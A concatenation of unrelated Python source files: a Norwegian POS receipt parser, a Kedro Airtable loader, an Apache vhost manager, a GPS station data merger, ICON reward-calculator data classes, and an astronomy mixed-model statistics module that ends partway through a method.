self.kvittering.tidspunkt = self.tz.localize(
datetime.strptime(m.group(1), "%d-%m-%y %H:%M")
)
self.kvittering.nummer = int(m.group(2), base=10)
return True
else:
return False
def receipt_transaction_line(self, line):
m = self.receipt_transaction.search(line)
if m:
try:
self.kvittering.linjer.append(
self.to_line(
m.group(1),
m.group(2),
m.group(3).strip(),
m.group(4),
m.group(5),
)
)
except IgnoredLineException:
pass
return True
else:
return False
def z_number_line(self, line):
m = self.z_number.search(line)
if m:
self.z.nummer = int(m.group(1), base=10)
return True
else:
return False
def start_date_line(self, line):
m = self.start_date.search(line)
if m:
if not self.z.tidspunkt:
self.z.tidspunkt = self.tz.localize(
datetime.strptime(m.group(1), "%d-%m-%Y %H:%M")
)
return True
else:
return False
def to_line(self, code, number, name, count, sum):
t = self.type(code)
nummer = int(number, base=10)
if t == "sale" or t == "refund":
try:
vare = Salgsvare.objects.get(kassenr=nummer)
if vare.kassenavn == name:
return Kassetransaksjon(
kvittering=self.kvittering,
salgsvare=vare,
antall=int(count, base=10),
)
else:
self.name_mismatch(vare, name)
except ObjectDoesNotExist:
print("Fant ingen match for: %s %d %s" % (t, nummer, name))
print("Hva vil du gjøre?")
print("Lag ny salgsvare [1]")
print("Lag ny mapping til eksisterende salgsvare [2]")
action = int(input("Velg kommando: "))
if action == 1:
self.create_salgsvare(number)
elif action == 2:
self.create_mapping(number, name)
raise IgnoredLineException()
def type(self, code):
if code == "A":
return "sale"
elif code == "R":
return "payment"
elif code == "x":
return "tax"
elif code == "K":
return "refund"
elif code == "L":
# return 'cancelled_sale'
# Ignore canelled sales
raise IgnoredLineException()
elif code == "c" or code == "h":
raise IgnoredLineException()
else:
raise UnknownLineException("Unknown line code: %s" % code)
def name_mismatch(self, vare, name):
"""
Handler for mismatch between the name stored in the database and the
name stored in the pos system.
"""
print(
'Kassenavn for vare #%d ("%s") matcher ikke ("%s" != "%s")'
% (vare.kassenr, vare.navn, vare.kassenavn, name)
)
print("Oppdater navn på salgsvare [1]")
print("Map til annen vare [2]")
action = int(input("Velg kommando: "))
if action == 1:
vare.kassenavn = name
vare.save()
elif action == 2:
self.find_salgsvare()
# self.create_mapping(vare.kassenr, name)
def create_salgsvare(self, number):
category = input("Kategori: ")
name = input("Navn: ")
account = input("Salgskonto: ")
status = input("Status: ")
print("%s %s %s %s %s" % (category, name, account, status, number))
def create_mapping(self, num, name):
target = int(input("Kassenummer: "))
vare = Salgsvare.objects.get(kassenr=target)
print("Ny map fra %d:%s til %d:%s" % (num, name, vare.kassenr, vare.navn))
def find_salgsvare(self):
while True:
name = input("Søk etter vare: ")
varer = Salgsvare.objects.filter(navn__icontains=name)[:10]
if len(varer) == 0:
print("Fant ingen varer som matcher")
else:
for vare in varer:
print("#%d %s" % (vare.pk, vare.navn))
try:
int(input("Velg en vare (ctrl-c for å søke på nytt): "))
return True
except KeyboardInterrupt:
print("")
class UnknownLineException(Exception):
"""
Thrown when we find a linetype we do not support
"""
pass
class IgnoredLineException(Exception):
"""
An exception to throw when a line should be ignored
"""
pass
|
import time
from typing import Dict, Any
import urllib.parse
import pandas
import requests
from threading import Semaphore, Thread
from kedro.io import AbstractDataSet, DataSetError
class AirtableException(DataSetError):
pass
AIRTABLE_RECORD_ID_COLUMN = '__airtable_id'
AIRTABLE_CREATED_TIME_COLUMN = '__airtable_created_time'
class AirtableDataSet(AbstractDataSet):
BASE_API = 'https://api.airtable.com/v0'
def __init__(
self,
table_name: str,
view: str = '',
credentials: Dict[str, str] = None,
):
"""
:param table_name:
:param credentials:
base_id:
api_key:
"""
self._table_name = table_name
self._view = view
if credentials is None or 'api_key' not in credentials or 'base_id' not in credentials:
raise DataSetError('Credentials must be passed with "api_key" and "base_id" keys')
self._api_key = credentials['api_key']
self._base_id = credentials['base_id']
self._api_semaphore = Semaphore(5)
def _page_url(self, offset=''):
pagination_params = urllib.parse.urlencode({
'pageSize': 100,
'offset': offset,
})
api_url = f'{AirtableDataSet.BASE_API}/' \
f'{self._base_id}/' \
f'{urllib.parse.quote(self._table_name)}?' \
f'{pagination_params}'
return api_url
@property
def _headers(self):
return {
'Authorization': f'Bearer {self._api_key}'
}
def _gen_releaser(self):
semaphores = self._api_semaphore
logger = self._logger
def _releaser():
logger.debug("Waiting Release Sem")
time.sleep(1)
logger.debug("Releasing Sem")
semaphores.release()
return _releaser
def _call_api(self, offset=''):
url = self._page_url(offset=offset)
while True:
self._api_semaphore.acquire(timeout=999999)
self._logger.debug('Ack Sem')
t = Thread(target=self._gen_releaser())
t.daemon = True
resp = requests.get(url, headers=self._headers)
t.start()
if resp.status_code == 429:
time.sleep(30)
continue
elif resp.status_code >= 300:
j = resp.json()
if 'error' in j:
raise AirtableException(j['error']['type'])
else:
raise AirtableException(j)
return resp.json()
def _retrieve_records(self):
j = self._call_api()
if 'error' in j:
raise AirtableException(j['error']['type'])
all_records = j['records']
while 'offset' in j:
j = self._call_api(offset=j['offset'])
all_records += j['records']
return all_records
@staticmethod
def _clean_records(raw_records):
return [
{
**record['fields'],
AIRTABLE_RECORD_ID_COLUMN: record['id'],
AIRTABLE_CREATED_TIME_COLUMN: record['createdTime'],
}
for record in raw_records
]
def _load(self) -> Any:
raw_records = self._retrieve_records()
clean_records = self._clean_records(raw_records)
return pandas.DataFrame(clean_records)
def _save(self, data: Any) -> None:
raise DataSetError('Save Unsupported')
def _describe(self) -> Dict[str, Any]:
return dict(
table_name=self._table_name,
view=self._view,
base_id=self._base_id,
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# name: vhost.py
# author: <NAME>
# email: <EMAIL>
# created on: 11/03/2015
#
# pylint: disable=no-member
# TODO: add SSL capabilities
"""
ww.vhost
~~~~~~~~
A class to create Apache vhost configurations.
It extends WWFile.
"""
from __future__ import absolute_import, print_function
import subprocess
try:
from ext_pylib.files import Parsable
from ext_pylib.input import prompt, prompt_str
except ImportError:
raise ImportError('ext_pylib must be installed to run ww')
from . import settings as s
from .ww_file import WWFile
def run_command(command):
"""A function to run os commands."""
try:
retcode = subprocess.call(command, shell=True)
if retcode > 0:
print("Command was terminated by signal ", -retcode)
return False
else:
print("Command completed successfully.")
return True
except OSError as error:
print("Command: '" + command + "' failed. ")
print(error)
class Vhost(Parsable, WWFile):
"""A class that describes an Apache vhost configuration.
This is primarily a wrapper for vhost managment.
"""
def __init__(self, atts):
"""Initializes a Vhost file."""
self.regexes = {'directory' : ('<Directory "([^"\n]*")',
'<Directory {0}>'),
'htdocs' : ('DocumentRoot ["]?([^"\n]*)',
'DocumentRoot {0}'),
'error_log' : ('ErrorLog ["]?([^"\n]*)',
'ErrorLog {0}'),
'access_log' : ('CustomLog ["]?([^"\n]*)',
'CustomLog {0}'),}
self.setup_parsing()
super(Vhost, self).__init__(atts)
def create(self, data=''):
"""Creates a vhost file."""
# pylint: disable=attribute-defined-outside-init,redefined-variable-type
if data:
self.data = data
super(Vhost, self).create()
self.enable()
def parse(self):
"""Parses an existing vhost file (or the contents of memory).
Prompts when an attribute can't be found."""
self.read()
for attribute in ['htdocs', 'error_log', 'access_log']:
if not getattr(self, attribute, None):
print('Could not parse "' + attribute + '".')
setattr(self, attribute, prompt_str('What is the htdocs path?'))
htdocs = getattr(self, 'htdocs')
if isinstance(htdocs, list):
htdocs = htdocs[0]
access_log = getattr(self, 'access_log')
if isinstance(access_log, list):
access_log = access_log[0]
error_log = getattr(self, 'error_log')
if isinstance(error_log, list):
error_log = error_log[0]
log = access_log.rsplit('/', 1)[0]
return {'htdocs' : {'path' : htdocs},
'access_log' : {'path' : access_log},
'error_log' : {'path' : error_log},
'log' : {'path' : log}}
def verify(self, repair=False):
"""Verifies that the vhost file exists and is enabled."""
result = super(Vhost, self).verify(repair)
if not self.is_enabled():
print('Vhost configuration file for ' + self.domain + ' is not enabled.')
if not repair:
return False
else:
self.enable(False)
print('Vhost for ' + self.domain + ' is enabled.')
return result
def is_enabled(self):
"""Checks if apache is serving this vhost."""
cmd = s.CMD_CHECK_IF_ENABLED.format(self.domain)
try:
if subprocess.check_output(cmd, shell=True) == '':
return False
return True
except subprocess.CalledProcessError:
return False
def enable(self, ask=True):
"""Enables vhost and restarts apache server."""
if self.is_enabled():
return True
if not ask or prompt('Enable ' + self.domain + ' in apache?'):
print('Enabling ' + self.domain + ' vhost...')
return run_command(s.CMD_ENABLE_CONFIG + self.domain) and \
run_command(s.CMD_RESTART_APACHE)
def disable(self, ask=True):
"""Disable vhost and restarts apache server."""
if not self.is_enabled():
return True
if not ask or prompt('Disable ' + self.domain + ' in apache?'):
print('Disabling ' + self.domain + ' vhost...')
return run_command(s.CMD_DISABLE_CONFIG + self.domain) and \
run_command(s.CMD_RESTART_APACHE)
|
#!/usr/local/bin/python
#==========================================================================
# Creates the combined "all_stations.all.input" file for all the stations
# associated with a particular data set type. That is, we will create
# this file of combined inputs for WNAM_Filter_DetrendNeuTimeSeries_jpl,
# WNAM_Clean_DetrendNeuTimeSeries_jpl, etc.
#
# We choose 2004-01-01 as the starting date for this file. The format is
# a series of columns as follows: time, stations1-East, station1-North, station1-Up,
# station2-East, station2-North, station2-Up,..., stationN-East, stationN-North, stationN-Up.
#==========================================================================
import os, sys, string, re
from datetime import date, datetime, timedelta, time
from properties import properties
import linecache
# Useful constants
START_EPOCH="1994-01-01"
BASE_OUTPUT_DIR="./"
SPACE=" "
def getStationName(stationDir):
stationName=stationDir.split("_")[2]
return stationName
def getStationAllRawFile(stationsFullPath):
rawFileName=""
valueSet=False
for file in os.listdir(stationsFullPath):
if(file.endswith(".all.raw")):
rawFileName=file
valueSet=True
break
if valueSet:
return stationsFullPath+"/"+rawFileName
else:
raise Exception("Station directory"+stationsFullPath+" has no .all.raw file")
# Append ${station}-x, ${station}-y, and ${station-z} as column headings
def appendColumnHeadings(stationName,outputTmpList):
newline=outputTmpList[0]+SPACE+stationName+"-x"+SPACE+stationName+"-y"+SPACE+stationName+"-z"
outputTmpList[0]=newline
return
# This is a utility function that converts an isoformatted date string to a date object.
def convertIsoStringToDate(isostringdate):
# Create a fullfledged date object from the string
splitdatestamp=isostringdate.split("-")
theDate=date(int(splitdatestamp[0]),int(splitdatestamp[1]),int(splitdatestamp[2]))
return theDate
# Inspect the raw data line and extract the date as a date object.
def extractRawDataDate(rawline):
# The date and time will be the second entry in the line.
fullTimestamp=rawline.split()[1]
# Split off the date from the time of day.
datestamp=fullTimestamp.split("T")[0]
theDate=convertIsoStringToDate(datestamp)
duplicate=False
if(fullTimestamp.split("T")[1]=="22:22:22"): duplicate=True
return (theDate,duplicate)
# Write the time column with header "time".
def writeTimeColumn(outputTmpList):
outputTmpList.append("time")
iterday=convertIsoStringToDate(START_EPOCH)
while iterday<=date.today():
outputTmpList.append(iterday.isoformat())
iterday+=timedelta(days=1)
return
# Write NaN for stations that don't have data at the given time stamp
def writeNaNColumn(outputTmpList,index):
nanList=["NaN","NaN","NaN"]
# Need to get the original line
appendLineColumns(nanList,outputTmpList,index)
return
# Write station data for given line
def writeStationColumns(line,outputTmpList,lineindex):
splitline=line.split(" ")
stationdata=[splitline[2],splitline[3],splitline[4]]
appendLineColumns(stationdata,outputTmpList,lineindex)
return
# Write the station columns to the composite output file
def appendLineColumns(moreCols, outputTmpList, index):
newline=outputTmpList[index]
for column in moreCols:
newline+=SPACE+column
outputTmpList[index]=newline
return
# A station may have data before the epoch starts, so skip these
def handleStationHasDataBeforeEpoch(epochDate,stationAllRaw,outputTmpList):
with open(stationAllRaw,"r") as allRawFile:
while True:
line=allRawFile.readline()
# The station data ended before the epoch began, so return out of the
# whole function. We don't expect this to happen.
if not line:
print "WARNING: Station " +stationName+ " has no data after "+START_EPOCH
return
# Check the date. If we are up to the epoch start date, break out. Otherwise,
# continue the while and read the next line.
dateStampDate=extractRawDataDate(line)[0]
if(dateStampDate>=epochDate):
break
allRawFile.close()
return
def handlePriorToStationStartDate(epochDate,stationStartDate,outputTmpList,lineindex):
iterday=epochDate
while True:
if(stationStartDate<=iterday):
# We have iterated to the first day with data for this station, so break out
break
else:
writeNaNColumn(outputTmpList,lineindex)
lineindex+=1
iterday+=timedelta(days=1)
return (iterday,lineindex)
def iterateOverDays(iterday,allRawInput,outputTmpList,lineindex):
while iterday<=date.today():
line=allRawInput.readline()
# We have run out of data, so break
if not line: break
# Get the timestamp from the line
(stationDataDate,duplicate)=extractRawDataDate(line)
# Make sure the data's date and iterday match
if(stationDataDate==iterday and not duplicate):
writeStationColumns(line, outputTmpList,lineindex)
else:
writeNaNColumn(outputTmpList,lineindex)
# Go to the next day.
iterday+=timedelta(days=1)
lineindex+=1
return iterday, lineindex
# Handle missing data from station's last data date until today.
def handleStationEndData(iterday,outputTmpList,lineindex):
while iterday<=date.today():
writeNaNColumn(outputTmpList,lineindex)
lineindex+=1
iterday+=timedelta(days=1)
return iterday
# Do the work
def writeAllStationColumns(stationName, stationAllRawName, outputTmpList):
epochDate=convertIsoStringToDate(START_EPOCH)
with open(stationAllRawName,"r") as allRawInput:
# Handle this special case
#handleStationHasDataBeforeEpoch(epochDate,allRawInput,outputTmpList)
# Write out initial data
lineindex=1 # Start at 1 since line 0 is the header
stationStartDate=extractRawDataDate(allRawInput.readline())[0]
(iterday,lineindex)=handlePriorToStationStartDate(epochDate,stationStartDate,outputTmpList,lineindex)
# We are ready to start writing data. Note we expect to break out of this while
# before iterday==today.
# Reset raw date file readline to 0
allRawInput.seek(0)
(iterday,lineindex)=iterateOverDays(iterday,allRawInput,outputTmpList,lineindex)
# We have passed the end of data for the station, so fill the remaining days up to today
# with NaN lines. This may not be executed.
handleStationEndData(iterday, outputTmpList,lineindex)
#close and return
allRawInput.close()
return
#--------------------------------------------------
# Below is the actual execution
#--------------------------------------------------
eval_dir_path = properties('eval_path')
# Loop over each data set
for dataSet in os.listdir(eval_dir_path):
projectDir=eval_dir_path+"/"+dataSet
if(os.path.isdir(projectDir)):
projectAllStationsOutputDir=BASE_OUTPUT_DIR+"/"+dataSet
# Make the directory to hold the output if necessary
if(not os.path.isdir(projectAllStationsOutputDir)): os.makedirs(projectAllStationsOutputDir)
# This is a list to store the lines of the file.
outputTmpList=[]
writeTimeColumn(outputTmpList)
# Loop over station directories
for stationDir in os.listdir(projectDir):
if (os.path.isdir(projectDir+"/"+stationDir)):
stationName=getStationName(stationDir)
try:
stationAllRawName=getStationAllRawFile(projectDir+"/"+stationDir)
appendColumnHeadings(stationName,outputTmpList)
writeAllStationColumns(stationName,stationAllRawName,outputTmpList)
except Exception, e:
print "Something is screwy: ", e
pass
# Write the station values list to the appropriate file.
allInputFileName=projectAllStationsOutputDir+"/"+"all_stations.all.input"
with open(allInputFileName,"w") as allInputFile:
for line in outputTmpList:
allInputFile.write(line+"\n")
allInputFile.close()
del outputTmpList
|
# -*- coding: utf-8 -*-
# Copyright 2019 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABCMeta, abstractmethod
from enum import IntEnum
from typing import Any, TYPE_CHECKING, List, Optional
from ...base.exception import InvalidParamsException
from ...icon_constant import DATA_BYTE_ORDER, RC_DB_VERSION_2, RC_DB_VERSION_0
from ...utils.msgpack_for_ipc import MsgPackForIpc, TypeTag
if TYPE_CHECKING:
from ...base.address import Address
class TxType(IntEnum):
DELEGATION = 0
PREP_REGISTER = 1
PREP_UNREGISTER = 2
INVALID = 99
class Data:
@abstractmethod
def make_key(self, *args, **kwargs) -> bytes:
pass
@abstractmethod
def make_value(self) -> bytes:
pass
@staticmethod
def from_bytes(*args, **kwargs) -> 'Data':
pass
class Header(Data):
PREFIX = b'HD'
def __init__(self):
self.version: int = 0
self.block_height: int = 0
self.revision: int = 0
def make_key(self) -> bytes:
return self.PREFIX
def make_value(self) -> bytes:
data = [
self.version,
self.block_height
]
if self.version >= RC_DB_VERSION_2:
# Added value in version 2
data.append(self.revision)
return MsgPackForIpc.dumps(data)
@staticmethod
def from_bytes(value: bytes) -> 'Header':
data_list: list = MsgPackForIpc.loads(value)
version: int = data_list[0]
if version == RC_DB_VERSION_2:
return Header._from_bytes_v2(data_list)
elif version == RC_DB_VERSION_0:
return Header._from_bytes_v1(data_list)
@staticmethod
def _from_bytes_v1(data_list: list) -> 'Header':
obj = Header()
obj.version: int = data_list[0]
obj.block_height: int = data_list[1]
return obj
@staticmethod
def _from_bytes_v2(data_list: list) -> 'Header':
obj = Header()
obj.version: int = data_list[0]
obj.block_height: int = data_list[1]
obj.revision: int = data_list[2]
return obj
def __str__(self):
info: str = f"[{self.PREFIX}] version: {self.version}, block_height: {self.block_height} "
if self.version >= RC_DB_VERSION_2:
info += f"revision: {self.revision} "
return info
class GovernanceVariable(Data):
PREFIX = b'GV'
def __init__(self):
# key
self.block_height: int = 0
# value
self.version: int = 0
self.calculated_irep: int = 0
self.reward_rep: int = 0
self.config_main_prep_count: int = 0
self.config_sub_prep_count: int = 0
def make_key(self) -> bytes:
block_height: bytes = self.block_height.to_bytes(8, byteorder=DATA_BYTE_ORDER)
return self.PREFIX + block_height
def make_value(self) -> bytes:
data = [
self.calculated_irep,
self.reward_rep,
]
if self.version >= RC_DB_VERSION_2:
# Added value in version 2
data.append(self.config_main_prep_count)
data.append(self.config_sub_prep_count)
return MsgPackForIpc.dumps(data)
@staticmethod
def from_bytes(key: bytes, value: bytes) -> 'GovernanceVariable':
# Method for debugging
data_list: list = MsgPackForIpc.loads(value)
# need to be refactor
if len(data_list) > 2:
return GovernanceVariable._from_bytes_v2(key, data_list)
else:
return GovernanceVariable._from_bytes_v1(key, data_list)
@staticmethod
def _from_bytes_v1(key: bytes, data_list: list) -> 'GovernanceVariable':
obj = GovernanceVariable()
obj.block_height: int = int.from_bytes(key[2:], DATA_BYTE_ORDER)
obj.version: int = RC_DB_VERSION_0
obj.calculated_irep: int = data_list[0]
obj.reward_rep: int = data_list[1]
return obj
@staticmethod
def _from_bytes_v2(key: bytes, data_list: list) -> 'GovernanceVariable':
obj = GovernanceVariable()
obj.block_height: int = int.from_bytes(key[2:], DATA_BYTE_ORDER)
obj.version: int = RC_DB_VERSION_2
obj.calculated_irep: int = data_list[0]
obj.reward_rep: int = data_list[1]
obj.config_main_prep_count: int = data_list[2]
obj.config_sub_prep_count: int = data_list[3]
return obj
def __str__(self):
info: str = f"[{self.PREFIX}] key: {self.block_height}," \
f" calculated_irep: {self.calculated_irep}, reward_rep: {self.reward_rep}"
if self.version >= RC_DB_VERSION_2:
info += f"config_main_prep_count: {self.config_main_prep_count}, " \
f"config_sub_prep_count: {self.config_sub_prep_count}"
return info
def make_block_produce_info_key(block_height: int) -> bytes:
return BlockProduceInfoData.PREFIX + block_height.to_bytes(8, byteorder=DATA_BYTE_ORDER)
class BlockProduceInfoData(Data):
PREFIX = b'BP'
def __init__(self):
# key
self.block_height: int = 0
# value
self.block_generator: Optional['Address'] = None
self.block_validator_list: Optional[List['Address']] = None
def make_key(self) -> bytes:
return make_block_produce_info_key(self.block_height)
def make_value(self) -> bytes:
data = [
MsgPackForIpc.encode(self.block_generator),
[MsgPackForIpc.encode(validator_address) for validator_address in self.block_validator_list]
]
return MsgPackForIpc.dumps(data)
@staticmethod
def from_bytes(key: bytes, value: bytes) -> 'BlockProduceInfoData':
# Method for debugging
data_list: list = MsgPackForIpc.loads(value)
obj = BlockProduceInfoData()
obj.block_height: int = int.from_bytes(key[2:], DATA_BYTE_ORDER)
obj.block_generator: 'Address' = MsgPackForIpc.decode(TypeTag.ADDRESS, data_list[0])
obj.block_validator_list: list = [MsgPackForIpc.decode(TypeTag.ADDRESS, bytes_address)
for bytes_address in data_list[1]]
return obj
def __str__(self):
return f"[{self.PREFIX}] " \
f"key: {self.block_height}, " \
f"block_generator: {str(self.block_generator)}, " \
f"block_validators: {[str(addr) for addr in self.block_validator_list]}"
class PRepsData(Data):
PREFIX = b'PR'
def __init__(self):
# key
self.block_height: int = 0
# value
self.total_delegation: int = 0
self.prep_list: Optional[List['DelegationInfo']] = None
def make_key(self) -> bytes:
block_height: bytes = self.block_height.to_bytes(8, byteorder=DATA_BYTE_ORDER)
return self.PREFIX + block_height
def make_value(self) -> bytes:
encoded_prep_list = [[MsgPackForIpc.encode(delegation_info.address),
MsgPackForIpc.encode(delegation_info.value)] for delegation_info in self.prep_list]
data = [
MsgPackForIpc.encode(self.total_delegation),
encoded_prep_list
]
return MsgPackForIpc.dumps(data)
@staticmethod
def from_bytes(key: bytes, value: bytes) -> 'PRepsData':
# Method for debugging
data_list: list = MsgPackForIpc.loads(value)
obj = PRepsData()
obj.prep_list = []
obj.block_height: int = int.from_bytes(key[2:], DATA_BYTE_ORDER)
obj.total_delegation = MsgPackForIpc.decode(TypeTag.INT, data_list[0])
prep_list: list = [
[MsgPackForIpc.decode(TypeTag.ADDRESS, delegation_info[0]),
MsgPackForIpc.decode(TypeTag.INT, delegation_info[1])]
for delegation_info in data_list[1]
]
for prep in prep_list:
del_info = DelegationInfo()
del_info.address = prep[0]
del_info.value = prep[1]
obj.prep_list.append(del_info)
return obj
def __str__(self):
return f"[{self.PREFIX}] " \
f"key: {self.block_height}, total_delegation: {str(self.total_delegation)}"
class TxData(Data):
PREFIX = b'TX'
def __init__(self):
self.address: 'Address' = None
self.block_height: int = 0
self.type: 'TxType' = TxType.INVALID
self.data: 'Tx' = None
def make_key(self, index: int) -> bytes:
tx_index: bytes = index.to_bytes(8, byteorder=DATA_BYTE_ORDER)
return self.PREFIX + tx_index
def make_value(self) -> bytes:
tx_type: 'TxType' = self.type
tx_data: 'Tx' = self.data
if isinstance(tx_data, Tx):
tx_data_type = tx_data.get_type()
if tx_type == TxType.INVALID:
tx_type = tx_data_type
elif tx_type != tx_data_type:
raise InvalidParamsException(f"Mismatch TxType: {tx_type}")
else:
raise InvalidParamsException(f"Invalid TxData: {tx_data}")
data = [
MsgPackForIpc.encode(self.address),
self.block_height,
tx_type,
tx_data.encode()
]
return MsgPackForIpc.dumps(data)
@staticmethod
def from_bytes(value: bytes) -> 'TxData':
# Method for debugging
data_list: list = MsgPackForIpc.loads(value)
obj = TxData()
obj.address: 'Address' = MsgPackForIpc.decode(TypeTag.ADDRESS, data_list[0])
obj.block_height: int = data_list[1]
obj.type: 'TxType' = TxType(data_list[2])
obj.data: 'Tx' = TxData._covert_tx_data(obj.type, data_list[3])
return obj
@staticmethod
def _covert_tx_data(tx_type: 'TxType', data: tuple) -> Any:
if tx_type == TxType.DELEGATION:
return DelegationTx.decode(data)
elif tx_type == TxType.PREP_REGISTER:
return PRepRegisterTx.decode(data)
elif tx_type == TxType.PREP_UNREGISTER:
return PRepUnregisterTx.decode(data)
else:
raise InvalidParamsException(f"InvalidParams TxType: {tx_type}")
class Tx(object, metaclass=ABCMeta):
@abstractmethod
def get_type(self) -> 'TxType':
pass
@abstractmethod
def encode(self) -> list:
pass
@staticmethod
@abstractmethod
def decode(data: list) -> Any:
pass
class DelegationTx(Tx):
def __init__(self):
self.delegation_info: List['DelegationInfo'] = []
def get_type(self) -> 'TxType':
return TxType.DELEGATION
def encode(self) -> tuple:
data = [x.encode() for x in self.delegation_info]
return MsgPackForIpc.encode_any(data)
@staticmethod
def decode(data: tuple) -> 'DelegationTx':
data_list: list = MsgPackForIpc.decode_any(data)
obj = DelegationTx()
obj.delegation_info: list = [DelegationInfo.decode(x) for x in data_list]
return obj
class DelegationInfo(object):
def __init__(self):
self.address: 'Address' = None
self.value: int = None
def encode(self) -> list:
return [self.address, self.value]
@staticmethod
def decode(data: list) -> 'DelegationInfo':
obj = DelegationInfo()
obj.address: 'Address' = data[0]
obj.value: int = data[1]
return obj
class PRepRegisterTx(Tx):
def __init__(self):
pass
def get_type(self) -> 'TxType':
return TxType.PREP_REGISTER
def encode(self) -> tuple:
return MsgPackForIpc.encode_any(None)
@staticmethod
def decode(data: tuple) -> 'PRepRegisterTx':
obj = PRepRegisterTx()
return obj
class PRepUnregisterTx(Tx):
def __init__(self):
pass
def get_type(self) -> 'TxType':
return TxType.PREP_UNREGISTER
def encode(self) -> tuple:
return MsgPackForIpc.encode_any(None)
@staticmethod
def decode(data: tuple) -> 'PRepUnregisterTx':
obj = PRepUnregisterTx()
return obj
|
__author__ = "<NAME> :: New Mexico Mira Project, Albuquerque"
""" Module 'astrosupport.stats'.
Numerous statistics and regression classes and functions.
Fork of (extract of) photrix.util, begun 2020-10-23.
Intentions: (1) a separate, importable module for use by all EVD astro python projects.
(2) freely forkable & useful to the astro python global community.
See test file test/test_stats.py for usage.
"""
# Python core packages:
from math import sqrt
# External packages:
import pandas as pd
import statsmodels.regression.mixed_linear_model as sm_mm # NB: only statsmodels version >= 0.8
import statsmodels.api as sm_api # sm version >= 0.8
_____REGRESSION_____________________________________________ = 0
class MixedModelFit:
""" Object: holds info for one mixed-model (py::statsmodel) fit. TESTS OK 2020-10-25.
Generic in nature--NOT tied to astronomical usage.
Uses formula form, i.e., statsmodel::sm_mm.MixedLM.from_formula()
Usage: fit = MixedModel(df_input, 'Y', ['X1', 'X2'], 'a_group_type']
fit = MixedModel(df_input, 'Y', 'X1', 'a_group_type'] (OK if only one indep var)
Fields available from MixedModelFit object:
.converged: True iff mixed model regression converged, else False. [boolean]
.dep_var: name of dependent variable. [string]
.df_fixed_effects, one row per fixed effect & intercept [pandas Dataframe]
columns:
(index): 'Intercept' or name of fixed effect (independent variable)
Name: same as (index)
Value: best value (coefficient) of indep variable from fit
Stdev: std deviation of Value from fit
Tvalue: Value / Stdev from fit
Pvalue: [ignore]
.df_observations, one row per observation used in fit:
columns:
(index):
FittedValue: value predicted from fit for observation
Residual: obs value - fitted value for observation
.df_random_effects: one row per effect group (for photometry, usually one row per image):
columns:
(index): ID of group (for photometry, usually imageID = FITS file name)
GroupName: same as index.
Group ['GroupValue' previously but now obsolete]: random effect for this group
(for photometry, usually 'cirrus effect', the image's average intensity over targets
minus the average of these values over all targets)
.fixed_vars: list of fixed variable names, does not include 'Intercept' [list of strings]
.likelihood: ?
.nobs: count of observations [int]
.sigma: std deviation of residuals over all observations [float]
.statsmodels_object: embedded MixedMLResults object from statsmodels.
(needed for predictions using .predict(); not too directly useful to user)
"""
# TODO: Replace internal 'formula' API with column-name API, which is much more forgiving of var names.
def __init__(self, data, dep_var=None, fixed_vars=None, group_var=None):
""" Executes mixed-model fit & makes data available.
:param data: input data, one variable per column, one point per row. [pandas Dataframe]
:param dep_var: one column name as dependent 'Y' variable. [string]
:param fixed_vars: one or more column names as independent 'X' variable. [string or
list of strings]
:param group_var: one column name as group. (category; random-effect) variable [string]
"""
if not isinstance(data, pd.DataFrame):
print('Parameter \'data\' must be a pandas Dataframe of input data.')
return
if dep_var is None or fixed_vars is None or group_var is None:
print('Provide all parameters: dep_var, fixed_vars, and group_var.')
return
if not isinstance(dep_var, str) or not isinstance(group_var, str):
print('Parameters \'dep_var\' and \'group_var\' must both be strings.')
return
fixed_vars_valid = False # default if not validated
if isinstance(fixed_vars, str):
fixed_vars = list(fixed_vars)
fixed_vars_valid = True
if isinstance(fixed_vars, list):
if len(fixed_vars) >= 1:
if all([isinstance(var, str) for var in fixed_vars]):
fixed_vars_valid = True
if not fixed_vars_valid:
print('Parameter \'fixed_vars\' must be a string or a list of strings.')
return
formula = dep_var + ' ~ ' + ' + '.join(fixed_vars)
model = sm_mm.MixedLM.from_formula(formula, groups=data[group_var], data=data)
fit = model.fit()
self.statsmodels_object = fit # instance of class MixedLMResults (py pkg statsmodels)
# Scalar and naming attributes:
self.converged = fit.converged # bool
self.nobs = fit.nobs # number of observations used in fit
self.likelihood = fit.llf
self.dep_var = dep_var
self.fixed_vars = fixed_vars
self.group_var = group_var
self.sigma = sqrt(sum(fit.resid**2)/(fit.nobs-len(fixed_vars)-2))
# Fixed-effects dataframe (joins so we don't count on consistent input ordering):
df = pd.DataFrame({'Value': fit.fe_params})
df = df.join(pd.DataFrame({'Stdev': fit.bse_fe})) # join on index (enforce consistency)
df = df.join(pd.DataFrame({'Tvalue': fit.tvalues})) # " & any random effect discarded
df = df.join(pd.DataFrame({'Pvalue': fit.pvalues})) # " & "
df['Name'] = df.index
self.df_fixed_effects = df.copy()
# Random-effect dataframe, index=GroupName, cols=GroupName, GroupValue:
df = pd.DataFrame(fit.random_effects).transpose() # DataFrame, 1 row/group
df = df.rename(columns={'groups': 'Group'}) # was 'GroupValue'
df['GroupName'] = df.index
self.df_random_effects = df.copy()
# Observation dataframe (safe to count on consistent input ordering -> easier construction):
df = pd.DataFrame({'FittedValue': fit.fittedvalues})
df['Residual'] = fit.resid
self.df_observations = df.copy()
def predict(self, df_predict_input, include_random_effect=True):
""" Takes new_data and renders predicted dependent-variable values.
Optionally includes effect of groups (random effects), unlike py::statsmodels.
:param: new_data: new input data used to render predictions.[pandas DataFrame]
Extra (unused) columns are OK; model selects only needed columns.
The columns must include all (indep var and random-effect) columns used to make the model!
:param: include_random_effect: True to include them, False to omit/ignore [bool]
:return: predictions of dependent-variable values matching rows of new data (pandas Series)
"""
# Get predicted values on fixed effects only (per statsmodels' weird def. of 'predicted'):
fixed_effect_inputs = df_predict_input[self.fixed_vars] # 1 col per fixed effect variable
predicted_on_fixed_only = self.statsmodels_object.predict(exog=fixed_effect_inputs)
# If requested, add RE contibs (that were not included in MixedModels object 'fit'):
if include_random_effect:
df_random_effect_inputs = pd.DataFrame(df_predict_input[self.group_var])
df_random_effect_values = self.df_random_effects[['Group']] # was ['GroupValue']
